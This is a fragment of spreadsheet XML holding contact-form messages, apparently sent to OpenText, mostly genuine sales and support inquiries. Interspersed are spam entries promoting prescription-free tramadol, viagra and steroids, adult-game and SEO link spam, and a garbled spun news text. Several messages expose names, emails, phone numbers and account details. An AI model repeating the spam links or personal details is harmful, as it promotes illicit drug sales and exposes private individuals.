  <si>
    <t>I have just been received a receipt ch_1CQ0lfCoGUa9VTUcJFAvz5FW for a charge on my credit card xxxx xxxxxx 1005 for $144 for an account which I no longer use and which I thought had been closed over a year ago._x000D_
My name is Arthur Richardson.  The previous account was probably in the name of Purple Learning.  Could you please ensure this account is closed and refund me the $144? Thank you</t>
  </si>
  <si>
    <t>tramadol 50 mg tablet &lt;a href="https://buytramadolhcl.com/#"&gt;buy 100mg tramadol&lt;/a&gt; tramadol generic | [url=https://buytramadolhcl.com/#]buy tramadol overnight delivery[/url]</t>
  </si>
  <si>
    <t>Rückmeldung Kontaktaufnahme bezüglich OpenText Trials-Version</t>
  </si>
  <si>
    <t xml:space="preserve">Starting a new business and looking at the software options for document management.  Chasing pricing. _x000D_
</t>
  </si>
  <si>
    <t>buy generic tramadol online &lt;a href="https://buytramadol50mgg.com/#"&gt;tramadol 50 mg tablet&lt;/a&gt; buy tramadol online uk | [url=https://buytramadol50mgg.com/#]50mg tramadol[/url]</t>
  </si>
  <si>
    <t>buy tramadol overnight &lt;a href="https://onlinetramadolhcl.com/#"&gt;ultram tramadol&lt;/a&gt; tramadol hcl 50 mg tablet | [url=https://onlinetramadolhcl.com/#]tramadol hcl 50 mg tablet[/url]</t>
  </si>
  <si>
    <t>buy tramadol online cheap &lt;a href="https://onlinetramadol24.com/#"&gt;buy cheap tramadol 100mg online&lt;/a&gt; tramadol hcl 50 mg tablet | [url=https://onlinetramadol24.com/#]buy tramadol online cod only[/url]</t>
  </si>
  <si>
    <t>buy tramadol 100mg online &lt;a href="https://buytramadolhcl.com/#"&gt;buy cheap tramadol overnight&lt;/a&gt; buy tramadol online without prescription | [url=https://buytramadolhcl.com/#]tramadol hydrochloride[/url]</t>
  </si>
  <si>
    <t>We would like to investigate web-based training for a new software developer. We currently use Metastorm 9.1.2 and are migrating to 9.5 later this year. Unfortunately, we probably cannot fly someone overseas for training. Do you have local or webinar options? Do you offer topic-based webinar training?</t>
  </si>
  <si>
    <t xml:space="preserve">I need a quote for Hummingbird xWindows Suite license.  Please let me know whom I should contact.  If you have a federal contracting vehicle, I'd like to get information on that as well.  Thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">Trying to log into OpenText for Onboarding Nordstrom for Filson (I work for Bedrock which is the parent company for Filson and Shinola).  My login is dcantley_filson.  It won't accept my password, and when I went through the [forgot password] process, it said it didn't have my email address on record, so couldn't reset it.  My email address is dcantley@shinola.com - not sure why it won't let me in._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, we are looking to get more information on how your fax services work. Thank  you. </t>
  </si>
  <si>
    <t>I have tried to contact the Americas number listed below as 800-499-6544 but it is advising that the number is invalid. Perhaps this number should be corrected on your site? Can I have someone contact me regarding a request that I put into your system today for a Kenrick Sutton? My number is 866-828-7420 select option 0 and ask for me by name. Thank you! Sandy</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for an ECM solution and would like to see if your product is a good match. We can provide a detailed list of what we are looking for. </t>
  </si>
  <si>
    <t>Download problem</t>
  </si>
  <si>
    <t>Need to register with OpenText support site. Need info. on Product Line, ID etc. to complete the registration</t>
  </si>
  <si>
    <t>We are evaluating archival systems that can replace IBM Content Manager OnDemand (CMOD) application. Which specific OpenText product(s) / solution(s) do you recommend we look into that can do what IBM Content Manager OnDemand does? Some of the requirements that the product(s) / solution(s) should be able to meet are -_x000D_
1.	Ability to define multiple definitions for the types of documents (PDF, AFP (a large scale print format, text files, MS Office format types including email, Word &amp; Excel (both old and new formats), etc.) to be stored_x000D_
2.	Ability to index and search all documents_x000D_
3.	Ability to define index structure for each feed_x000D_
4.	Ability to retain documents for varying periods from legal and compliance point of view (few days to 30 years); delete the document upon retention expiry_x000D_
5.	Ability to comply with SEC regulations when retaining documents; all documents should be stored as read-only and cannot be altered_x000D_
6.	Ability to provide common interface for WEB applications and common set of APIs to access documents_x000D_
7.	Ability to build processes for loading data to the archive to ensure proper control_x000D_
8.	Ability to handle multiple data feeds (90+)_x000D_
9.	Ability to migrate/load existing documents from IBM CMOD in the same file format_x000D_
Can you share any documentation that highlights the product characteristics that can meet above requirements?_x000D_
_x000D_
Some context on IBM CMOD indexing functionality – Indexing of the documents is handled by CMOD in 2 ways: the ACIF indexer for AFP and Generic indexer for all others. AFP files are very compact and offer the best performance with index information embedded within the file (a file could have 20K docs in it, each having its own index data). AFP is also compressed as it is stored in the archive (upwards to 90% compression in some cases) to save storage space.</t>
  </si>
  <si>
    <t>Looking for a redaction solution for legal order processing</t>
  </si>
  <si>
    <t xml:space="preserve">We have are setting up the contract as a Sears Supplier and we need information for the item setup process. </t>
  </si>
  <si>
    <t>Was asked to reach out about the fax solution that integrates with AllScripts.  Would like to find out if this is cloud based or on prem, as well as pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to discuss blockchain enabled partnership opportunities. </t>
  </si>
  <si>
    <t>OpenText Brava! for Documentum Webtop. We would like to get more information on it.</t>
  </si>
  <si>
    <t xml:space="preserve">We are exploring online employee file management/workflow management -  as well as options to integrate with our SAP on premise and SuccessFactors solutions. We have many manual paper based processes that we would like to explore and automate. </t>
  </si>
  <si>
    <t>In my company we want to buy an aplication that allow us to hold the data on the internet cloud. But we have some questions we want to be answered, if its posible we want to contact to someone in spanish by telephone. You can call us at +34 943 477 365, at any working ours._x000D_
Best regards_x000D_
Liher Romero</t>
  </si>
  <si>
    <t>We are a legal publication company and have unique needs regarding OCRing, database structure, and tagging.</t>
  </si>
  <si>
    <t>The purpose of our comment study was to analyse direct respondent feedback in order to identify possible improvements for the content and collection instruments of the 2021 Census.  Its conclusions could serve as information used in support of findings of the broader 2021 Census content determination process, which considers Census program information needs gathered from data users, factors related to the Canadian context and Statistics Canada’s operational considerations._x000D_
The analysis of comments and development of a methodological roadmap began with an examination of recent literature on text mining.  The approach adopted involved a systems-based text mining process using SAS JMP’s Text Explorer function to assist in categorizing comments into themes relevant to potential improvements of census content and collection instruments.  A review of response behavior by theme followed._x000D_
_x000D_
Comments were mined for high frequency key words and phrases. Examination of these led to the emergence of 39 meaningful themes, into which all captured comments were classified based on their inclusion of key words and phrases._x000D_
_x000D_
The coding system allowed for a single comment to be classified under a number of themes (e.g., 'baby talk' and '92-year question'): if a comment contained keywords and phrases that spanned multiple themes, the comment fell under multiple themes. In addition, the classification system, due to certain technological constraints and the subjective nature of the comments, resulted in some misclassification of comments. The focus of this analysis is not to quantify the comments by theme, but rather to explore the issues raised by the comments for each theme. _x000D_
_x000D_
We have recently finished a project and we used SAS text miner along with SAS JMP for scraping text. We are looking into what other company’s projects can do to solve some of the known challenges from using the SAS products and were wondering what other solutions might exist._x000D_
_x000D_
We have a few questions fo</t>
  </si>
  <si>
    <t>I am interested in your content management solution and hosting services.  Please contact me.</t>
  </si>
  <si>
    <t>Looking for RightFAX Web API/Services SDK</t>
  </si>
  <si>
    <t>Inquiry about a quote for Brava Reader</t>
  </si>
  <si>
    <t xml:space="preserve">Сотрудники нашей фирмы воплотит в жизнь свою деятельность в сфере оказания услуг по Техническому обслуживанию и эксплуатации зданий и сооружений. Стратегическойцелью торговые фирмы по праву является формирование лучшего процесса управления, направленного на увеличениекапитализации объектанедвижимости и снижение при этом эксплуатационного бюджета Клиента.    Осуществляем консалтинг по Сопровождение проекта, проектирование по Рабочая документацияа также занимаемся  Консалтингом инжиниринговых решений на ранних стадиях реализации проекта . Мастерство служащих и общепринятые стандарты потребительского качества, введённые в фирме, позволяют сдерживать потребительское качество выполняемых работ на наиболее самом высоком  уровне. При помощи выработанной в этой этой компании большой промышленной базе, работы на объектах изготовляются эффективно, а внештатные и срочные ситуации находят решение в кротчайшие сроки. _x000D_
 _x000D_
Градостроительный план земельного участка недорого _x000D_
 - [url=https://contrpro.ru/]как получить гпзу на земельный участок[/url] _x000D_
</t>
  </si>
  <si>
    <t>I have a client who's wants to book the training Documentum System Administration Fundamentals in Hoofddorp next week. Is a discount / fee for Vijfhart possible?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Guido</t>
  </si>
  <si>
    <t xml:space="preserve">"Hi,_x000D_
_x000D_
I am Amy Smith (Marketing consultant). I stumbled upon your website and realized that despite having a good design, your website is not ranking on any of the search engines with most of the business oriented keywords. I was wondering if you would be interested to optimization and social media promotion of your website._x000D_
_x000D_
All of our practices are “White Hat Techniques” and we strictly follow Google Webmasters Guidelines to promote our clients’ websites online. I will suggest some traffic generating keywords as per the principles of Search Engine Optimization._x000D_
_x000D_
If you are interested, then I can send you our past work details, company information and an affordable quotation. Please email us back to get detail._x000D_
_x000D_
If you are not interested please reply to this email with STOP and we will make sure not to contact you again._x000D_
_x000D_
Warm Regards,_x000D_
Amy Smith"_x000D_
</t>
  </si>
  <si>
    <t>I have already tried to contact OpenText to discuss Knowledge Management Software /Systems for the Legal department. _x000D_
We have already one instance, Documentum, installed and used within Euroclear. The current infrastructure provided does not meet the needs of the Legal department and I would like to discuss further implementation within Euroclear which may be tailored to what I am looking for (before I speak to my IT department). While I would like to contact a local European Office, I am not sure which one to contact (France, Netherlands or Germany)_x000D_
_x000D_
Thank you for coming back to me at least with a note on which office to contact for further details._x000D_
Yours sincerely,_x000D_
Gillian Hankey</t>
  </si>
  <si>
    <t>Hello, we are interested in the Brava! Desktop DXP Software. Is there a Chance to get a demo Version so that we can test the Software?</t>
  </si>
  <si>
    <t>We want to implement a new Document Management System for our company, and want to know how Opentext might operate in our organisation. Unfortunately, I don't always have a business phone available, so I would prefer contact via e-mail, at first.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi goodmorning,_x000D_
my name is riccardo petriccioli and I am a Royal Canin Italy employee._x000D_
I am contacting you because we would like to have a conversation regarding our business Reporting tools._x000D_
Do you have a point of contact here in Italy?_x000D_
Thank you_x000D_
_x000D_
riccardo_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
bitte senden Sie uns die Kontaktdaten Ihres Ansprechpartners zur Erstellung eines Angebotes._x000D_
_x000D_
Vielen Dank im Voraus!</t>
  </si>
  <si>
    <t>I would want to export all the archives of a customer and migrate them to another system._x000D_
Could you please advise me of an automated way for this to happen?</t>
  </si>
  <si>
    <t>[url=http://lastnewstoday.ru/pr/nords][img]http://lastnewstoday.ru/pr/nords/images/1.jpg[/img][/url] _x000D_
 _x000D_
[url=http://lastnewstoday.ru/pr/nords]игры для взрослых девочек онлайн _x000D_
[/url] _x000D_
 _x000D_
 _x000D_
игры поиск онлайн бесплатно для взрослых _x000D_
игры для взрослых видео бесплатно смотреть онлайн _x000D_
игры на логику и мышление взрослому онлайн _x000D_
игра для взрослых ххх онлайн бесплатно _x000D_
онлайн игры для взрослых про секс _x000D_
российские сериалы смотреть онлайн взрослые игры _x000D_
взрослые игры ирина чеснова читать онлайн бесплатно _x000D_
взрослые игры для мужчин играть онлайн _x000D_
игры на внимание онлайн для взрослых _x000D_
взрослые игры фильм смотреть онлайн американский _x000D_
flash игры онлайн для взрослых _x000D_
бесплатные игры онлайн 3d взрослых _x000D_
игры для взрослых играть онлайн бесплатно секретарша _x000D_
взрослые игры екатерины рождественской читать онлайн _x000D_
торрент игры для взрослых онлайн _x000D_
любовные игры взрослых людей бесплатно смотреть онлайн _x000D_
взрослые игры фильм смотреть онлайн комедия 2008 _x000D_
игры для взрослых 18 смотреть онлайн _x000D_
кэтрин джордж взрослые игры читать онлайн _x000D_
игры для тренировки памяти у взрослых онлайн _x000D_
игры онлайн пазлы для взрослых пейзажи</t>
  </si>
  <si>
    <t>Hi OpenText!_x000D_
_x000D_
Seems like we cannot find the pricing information readily available online._x000D_
Could you help share pricing information about your product? _x000D_
_x000D_
In general, we are working on a project that requires testing the file sharing functions of a multifunctional printer on various cloud storage such as RightFax._x000D_
_x000D_
Here are some information that might help:_x000D_
_x000D_
Q:	What are you hoping to accomplish with RightFax?_x000D_
A:	To test file sharing functions of a multifunctional printer on a cloud storage such as RightFax_x000D_
_x000D_
Q:	How many would need access to RightFax? _x000D_
A:	Only the Testing team (Less than 10)_x000D_
_x000D_
Q:	Where do you currently store, share, and collaborate on content? _x000D_
A:	Local network folder, SharePoint_x000D_
_x000D_
Q:	Why are you looking to make a change at this time? _x000D_
A:	The product that we need to test includes scenarios that include sharing content to Box._x000D_
_x000D_
Q:	Are you working with a specific timeline?_x000D_
A:	Yes, we need to be able to setup the RightFax account within this week if possible._x000D_
_x000D_
Q:	Are there any other decision makers involved?_x000D_
A:	The cost of paid subscription requires approval of other stakeholders._x000D_
_x000D_
Hope to hear from you soon._x000D_
_x000D_
_x000D_
-Gretchen</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am interested to attend the following course:_x000D_
3-0805 Implementing OpenText Media Management v16_x000D_
Preferred method is onsite in Reading, UK._x000D_
Is this course still available and will it be held? Will it cover v16.2 or only v16?_x000D_
I found the below course as well. Same number: is that still available?_x000D_
3-0805 Implementing OpenText Media Management v16.2_x000D_
Kind regards_x000D_
Matthias Fischer</t>
  </si>
  <si>
    <t>need to get a better understanding of your workforce management.</t>
  </si>
  <si>
    <t xml:space="preserve">HI_x000D_
_x000D_
Interested in an opt-in email list of Doctors, Physicians, Nurses, Healthcare and Medical Owners/Decision makers with purchasing power? _x000D_
_x000D_
If so, you are at the right place. Please let me know your requirement to get a quote and few sample contacts at no cost. _x000D_
_x000D_
Thanks_x000D_
Amy Gibbs_x000D_
</t>
  </si>
  <si>
    <t>drug online viagra|viagra price in sydney|dangers of viagra for men|viagra men uk|cheap viagra viagra buy deal|viagra generico preco rj|best site get viagra|viagra come acquistare|viagra netist|generic viagrakamagra uk|viagra tauranga|viagra tablets buy online|viagra russian|look here branded viagra|cheap herbal viagra uk|buy viagra low price|cheap viagra tablets for sale|ap kgr 100 viagra|viagra libre nz muestras|viagra levitra calvizi|viagra ratiopharm kaufen|pillole campione di viagra|viagra nitric oxide|how do i buy viagra in canada|precio viagra generico espaa|viagra generico online|good choice viagra buy now|viagra e tumor|tab viagra|buy viagra online paypal vipps|viagra mg india|viagra price in paris|viagraproben amerika|viagra was ist das|india viagra precio|best viagra to buy|pfizer viagra 0 pills sale|viagra safe dosage|viagra online pharmacies|viagra generika oder pfizer|buy safe viagra|viagra fr den mann kaufen|viagra en europe|boots viagra price|medicare part d viagra|viagra argentina|pfizer viagra kaufen|onde comprar viagra barato|viagra trial offer free|very good site women viagra|viagra online il piu economico|acheter viagra canada|viagra at tescoscost|acquisto viagra femminile|selling viagra in spain|viagra et libido|get sample viagra|canada viagra office|viagra rezeptfrei schnell|beginning dosage viagra|viagra orosolubile pfizer|viagra in new york kaufen|only for you order viagra pill|viagra nombre comercial|viagramg|viagra and cialis combined|with viagra cheap dapoxetine|viagra 100mg risks|brand viagra dose|do u need prescription viagra|tilaa viagraa|candy looks like viagra|generico viagra mg|sex on viagra|pfizer viagra canada patent|cost of viagra generic|viagra bieffekter|il viagra per cardiopatic|achat viagra tunisie|we choice uk viagra sales|viagra original bestellen|viagra homme effet|only here buy viagra in us|cialis vs viagra mg|buy viagra in usa online|price comparisons of viagra|viagra zagreb|where to buy viagra hong kong|female natural v</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
&gt; Dear Sir/Madam_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; This is regarding Ex-employment verification, Kindly provide the contact number/official mail id of Human Resource Department._x000D_
</t>
  </si>
  <si>
    <t>I want to know where vestige marketing office located in Philippines</t>
  </si>
  <si>
    <t>companions mark travelling across sell property in set back in order to Trump_x000D_
_x000D_
A gift basket liner appearing loaded attending the vent out in tokyo in feb 2016. okazaki, japan had a management aspect in accordance the coalition associated 11 nations down using overhauled Trans pacific cycles marriage._x000D_
_x000D_
SANTIAGO, Chile A investment pact originally designed by the american to successfully reverse China's improving economic might probably in south east asia featuring a unique work on: us president Trump's grab hold of towards protectionism._x000D_
_x000D_
several grouped [url=http://www.prweb.com/releases/charmingdate/charmingdate_scam_protect/prweb11792473.htm]charmdate.com[/url] 11 nations with the inclusion of best nation allies as asia, the us in addition to projects settled an extensive deal option located on friday within just Chile's money, Santiago, whom questions mr. Trump's glance at among commercial currently being a zero number sport full of those who win and losers._x000D_
_x000D_
covering 500 million the subject of women and men both sides through gulf of mexico, The pact delivers a different view to have offshore exchange as the particular imposes all steel metal with aluminium charges on regular wide variety its closest thing associates._x000D_
_x000D_
mister. Trump withdrew the country off a younger performace the actual agreement, after the Trans pacific love, A year ago as one of its first assists at work. The resuscitated property typically is undoubtedly weaker not having the participation of the world's most important financial system, nonetheless serves as good an indication associated that foreign territories that may have up to now counted on usa management grow to be forging in front without them._x000D_
_x000D_
however, Signatories are already beginning the entranceway in order for far east to enlist. Heraldo Muoz, Chile's currency minister, said to editors on monday morning regarding chinese language courses authorities used to be with a weight the chance of finalizing on._x000D_
_x000D_
"this ca</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope your day is going well.  I'm conducting a market study for PwC on EDI software. I was wondering if I could ask a few questions about OpenTEXT EDI:_x000D_
_x000D_
1) Does the solution use the VAN or AS2 protocol?  If it uses both, what percentage is through VAN vs. AS2?_x000D_
_x000D_
2) How does the pricing structure work?  I understand that there are subscription fees based on volume/usage; are these the same for buyers &amp; suppliers? Are there subscription fees or initial setup fees as well?_x000D_
_x000D_
3) Given the fee structure, could you shed some light on the price range for the solution (e.g. approximate fee per document)?_x000D_
_x000D_
4) Do you offer any other types of connections beyond EDI, like an API connection?_x000D_
_x000D_
Thank you for any light you can shed on these topics--- I greatly appreciate your help!_x000D_
_x000D_
Best,_x000D_
-Matt </t>
  </si>
  <si>
    <t xml:space="preserve">This is Michael Rittle and I work in Strategic Sourcing at First Data. I am putting together an RFI and I am looking for an account rep I can work with. First Data is looking for a workforce management solution and specifically we are looking for a software that can assess/measure various metrics and receive and integrate that data with multiple external data feeds. The RFI will be issued via Ariba and we need each vendor to register with Ariba before we can include them in the RFI. Please have someone email me._x000D_
</t>
  </si>
  <si>
    <t>Customer is looking for Right Fax server upgrade. They are currently using ver. 9.4. I would like to talk about quotes/options for an upgrade._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>We have an existing fax distribution offering that we are considering replacing and would like to discuss the RightFax offering and whether its a suitable alternative for us.We send and receive a high volume of faxes and are evaluating whether an in house fax server would better suit our needs.</t>
  </si>
  <si>
    <t>We are in the process of doing high-level product capabilities comparison between OpenText solutions and IBM Content Manager OnDemand (CMOD). Can you help us identify which specific OpenText solution (or combination of various solutions) is a direct "competitor" to IBM CMOD?</t>
  </si>
  <si>
    <t xml:space="preserve">i noticed on the your webpage states that the latest version of brava reader will not support pdf is that true or is there another version that does. thanks let me know. </t>
  </si>
  <si>
    <t xml:space="preserve">I have a few technical questions that I was hoping to get answered.  _x000D_
_x000D_
is it a cloud hosted service?  I see that your solution is multi-tenant so do you host your software in AWS, Azure or something along those lines?; does it also allow for single tenant environments?_x000D_
How can I connect my data center to your cloud hosted service?_x000D_
</t>
  </si>
  <si>
    <t>I would like to get a copy of all th courses I took at opentext as I just switched jobs. Thank yoy</t>
  </si>
  <si>
    <t>Fax Solutions. Please Respond.</t>
  </si>
  <si>
    <t>Good afternoon_x000D_
I have some questions before making the purchase of the license_x000D_
_x000D_
1) The license is already permanent and 2) invoice is delivered for the purchase_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>The password for our account VA358 isn't working. Can you help me?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Would you be interested in acquiring 55th DAC - Design Automation Conference 2018._x000D_
We can help you reach out to the Attendees prior to the event._x000D_
 _x000D_
Our list comes with complete contact Information includes, contact name, title, email address, contact numbers, company name, physical address, revenue size, company size, sic codes and many more intelligent data fields?_x000D_
 _x000D_
Let me know if you are interested to acquire the list of attendees in order to drive more traffic to your booth and create your awareness among these participants._x000D_
 _x000D_
Appreciate your time and look forward to hear from you._x000D_
 _x000D_
Warm regards,_x000D_
Ella Clark_x000D_
Demand Generation Coordinator_x000D_
ContactB2Blist/Updated Contacts_x000D_
</t>
  </si>
  <si>
    <t>Request for Trial button not working on your main page and I cant submit my information to request a trial.</t>
  </si>
  <si>
    <t xml:space="preserve">I need a quote and lead-time for the following.Material	_x000D_
Manufacturer/Cage Code	Short Text	QTY_x000D_
OTRF-BO	  OpenText Software | 6055N	RightFax Branch Office Server	1 EA_x000D_
OTRF-BO-PDF	  OpenText Software | 6055N	RightFax Branch Office Server – PDF Module	1 EA_x000D_
OTRF-BSUP	  OpenText Software | 6055N	OpenText Standard ASP Support for RightFax	1 EA_x000D_
PS-RLRRC	  OpenText Software | 6055N	Remote Installation and Configuration	2 LT_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for some licenses of Exceed version 10. Is this something still available? </t>
  </si>
  <si>
    <t xml:space="preserve">Our Client Gebrueder Weiss needs access for two new IT-colleagues (Michaela Drabik (michaela.drabik@gw-world.com)Martin Hilbe (martin.hilbe@gw-world.com) ) to the support area with the possibility to create tickets. _x000D_
_x000D_
many thanks,_x000D_
Michael </t>
  </si>
  <si>
    <t>I currently have the TD 6.1 license._x000D_
I wanted to know what is the cost to update to the latest version of TD (7.x), and how would be the licensing to update future versions._x000D_
_x000D_
Also, I wanted to know the cost of technical support._x000D_
_x000D_
I would also like a contact email to make technical queries about the tests I'm doing in the downloaded version of TD 7.0, about the publication of SOAP and REST services._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are using eDocs DM and I wonder if we can have access to your support pages?_x000D_
Im looking for a User manual</t>
  </si>
  <si>
    <t xml:space="preserve">My company (Duke Energy) current customers using Rightfax 10.6. I am currently looking at our future options and would like to find out more about the Rightfax Hybrid cloud. I've looked at the whitepaper documentation but would like to find out about pricing details so we can compare what our costs might be if we pursue the hybrid option. In addition, security is a constant concern so would also like any available background information on how the fax transmissions to/from the cloud are secured. </t>
  </si>
  <si>
    <t>General inquiries.</t>
  </si>
  <si>
    <t>I was told a copy of report writer was included with our Infor Visual software that we use but I have not been able to get a Production Activation Key (PAK) and I was hoping you could assist me with this._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Upgrading an aging home-grown scan/key-from-image data capture solution for a couple of state-level contracts. Looking at the possibility of using an off-the-shelf solution rather than rewriting from scratch. </t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
We have published a report on Global Cloud Services Brokerage Market- Forecasts to 2025._x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
_x000D_
Best Regards!_x000D_
</t>
  </si>
  <si>
    <t>Need to understand more about the OpenText Redact It Software for a proposal</t>
  </si>
  <si>
    <t>We are looking for a solution to transform the paper/pdf invoices we receive from hundreds of different vendors into structured data that would tell us what we are buying at the line item detail. Once the data is transformed, we would like to categorize it into some reasonably detailed IT taxonomy. The end goal is to transform paper/pdf invoices into data that would tell us what we are buying (e.g., hardware, software, maintenance, professional services with some amount of detail beyond those broad categories), from which vendor, for which period of time, etc.</t>
  </si>
  <si>
    <t>Это  красивый материал, который позволяет возвести конструкции хоть какой формы &lt;a href="http://abisgroup.ru/articles/ustanovka-unitaza-svoimi-rukami-video-instrukcija.htm"&gt;Установка унитаза своими руками - ВИДЕО. Инструкция по установке унитаза самостоятельно. Схема и технология - ЭтотДом&lt;/a&gt;.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Please note that I have been using BravaReader for quite a while now, but I recently noticed that it is no longer a freeware._x000D_
_x000D_
In view of this, I intent to purchase a license and have two questions:_x000D_
_x000D_
1. My need is to open tiffs and measure distances. If my understanding is correct from the relevant table on your website, the product that I should get is the “image Only” TX version. Could you please confirm my choice is correct?_x000D_
_x000D_
2. Considering that I intent to replace my laptop sometime soon, I would like to ask if I will be able somehow to transfer my license to my new laptop._x000D_
_x000D_
Thank you in advance for your time._x000D_
Chris.</t>
  </si>
  <si>
    <t>Looking for Weatherford's account manager for the EDOCs product.   Weatherford is upgrading it's MS Office suite and need to ensure compatibility with EDOCs.   Need an account manager to understand entitlements to ensure we can both EDOCs and Office 2016 seamlessly work together.   Please contact me at your earliest convenience. _x000D_
_x000D_
Cheers,_x000D_
Jim</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
 _x000D_
HireRight is a background screening company appointed by one of the Clients to verify information for the purposes of a pre-employment screening report and have been asked to confirm employment of one of your former employees._x000D_
 _x000D_
I would be grateful if you could provide contact details to your HR or to the person who would be able to confirm the dates of employment and position held and I will send a request for verification with the Candidate's details._x000D_
 _x000D_
Thank you in advance for your kind assistance._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
Hi, hope you are a ClickTale consultant. _x000D_
_x000D_
We have 3,885 Ready-To-Buy ClickTale Technology Customers Records from USA._x000D_
_x000D_
Test file will be given to review and check quality. _x000D_
_x000D_
Do you want to see the test file? _x000D_
_x000D_
_x000D_
Thank you _x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Belle Elida_x000D_
belle.elida@technologyinstalls.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Dear Open text,_x000D_
We have been using a fax line from Easylink and we would like to terminate the services with immediate effect._x000D_
And also please refer to invoice number A0254053 dated 31/03/2018 for Account number ICH10263. Account number is different from what we have in our records. Could you please amend the invoice and send us the final invoice so that we can settle the account and close the services._x000D_
Thanks_x000D_
Regards_x000D_
Jeya kumar</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.mir74.ru/21274-v-chelyabinskoy-oblasti-sredi-prostudnyh-infekciy-lidiruet-virus-grippa-h3n2-no-tochnye-cifry-v-rospotrebnadzore-ne-ozvuchivayut.html]вирус гриппа в челябинске[/url]_x000D_
[url=http://www.mir74.ru/cam/]камеры онлайн челябинск[/url]_x000D_
[url=http://www.mir74.ru/doska/auto.html]avto.ru челябинск[/url]_x000D_
[url=http://www.mir74.ru/24824-v-chelyabinske-zakryvaetsya-houm-centr.html]хоум центр[/url]_x000D_
[url=http://www.mir74.ru/pogoda/]челябинский гидрометцентр[/url]_x000D_
</t>
  </si>
  <si>
    <t>We have a Electronic Maintenance but I don't know how to download the lastest version._x000D_
MAINT-EXMPI550700M_x000D_
Electronic Maintenance Exceed_x000D_
01/07/2017 to 30/06/2018_x000D_
SUID #: V0423-11001_x000D_
Salesperson: Katy Atkinson_x000D_
P.O. Number: C03.175458E/9073_x000D_
Support Contract #: RC183373</t>
  </si>
  <si>
    <t>I have some Encase licences to renew is this something you can assist with at all please? _x000D_
_x000D_
Many Thanks_x000D_
Fiona</t>
  </si>
  <si>
    <t>I’m interested in discussing Fax2Mail for healthcare regarding the cost and setup process</t>
  </si>
  <si>
    <t>Hello, I need access to open text knowledge share to learn to measure open text products sold by SAP as part of my job. Can you please let me know how do I request for access._x000D_
Thanks_x000D_
Kapil</t>
  </si>
  <si>
    <t>Varför finns inte Documentum xCP med under er sida med BPM-produkter?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText!_x000D_
_x000D_
Seems like we cannot find the pricing information readily available online._x000D_
_x000D_
Could you help share pricing information about your product?_x000D_
_x000D_
We plan to test file sharing functions of a printer._x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for submission software. </t>
  </si>
  <si>
    <t>We are currently using RightFax 9.4, looking to upgrade the software and migrate into a different domain.</t>
  </si>
  <si>
    <t>We have been awarded 200 KM long pipeline project from PTT Thailand._x000D_
We required to use Project Document console software for the execution of project._x000D_
Please provide proposal cost _x000D_
Thanks_x000D_
Saravanan</t>
  </si>
  <si>
    <t xml:space="preserve">I wish to talk to someone about a Web based fax solution we currently have RFAX as a hard server with 800 fax numbers </t>
  </si>
  <si>
    <t>Looking for document control software.</t>
  </si>
  <si>
    <t xml:space="preserve">Please contact me via email only.  I am a current customer and need to speak with my representative.  Please forward this request to the current account manager.  Thank you! </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.cognitivismoclinico.net/components/feed.php?option=331-Cheap-Trenbolone-Enanthate-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate/]Cheap Trenbolone Enanthate[/url]_x000D_
 A fantastic technique that you ought to constantly be aware of when you are with your apple iphone is that you could make phone calls in the Safari web aspect as an alternative to moving backwards and forwards involving the telephone. This will help in order to save a lot of time and effort switching distinct monitors while searching._x000D_
  [url=http://pknstavoren.nl/journal/power.php?xqxu=329-Cheap-Testosterone-Treatment,Mesterolone-Cycle,Primobolan-Powder-Conversion]Cheap Testosterone Treatment[/url]_x000D_
 Should you be inside a connection, you may have breakouts of zits because of the extreme tension that you might be under. Make an effort to restriction the level of periods which you combat, to lower stress and anxiety and boost your encounter. Constantly being concerned and worrying out are contributive aspects in acne breakouts improvement._x000D_
  [url=http://www.villadiego-hotel-diegosuarez.com/cache/name.php?ai=634-Methandienone-Oral,Clomid-Australia-Price,Mesterolone-Ireland]Methandienone Oral[/url]_x000D_
 You need to ingest at the very least 4 liters of water each day if you want your muscle mass to cultivate. The body needs h2o to work appropriately but muscles require normal water to be able to repair after a work out and also to develop in size. Water to drink is not difficult if you carry a water bottle with you wherever you go._x000D_
  [url=http://www.taudos.kz/wp-admin/achieve.php?ei=1386-Testosterone-Powder-To-Injectable-Anavar-Oxandrolone-For-Sale-Uk-Methandienone-Price-In-Usa.html]Testosterone Powder To Injectable[/url]_x000D_
</t>
  </si>
  <si>
    <t>Need Support access that I know we have a license for.</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
I was reaching out to see if the Lexington, KY facility would use contract security officers. If so I would like to give your company a competitive bid for service for the contract. I tried to call the facility but it looks like the phone system is not working._x000D_
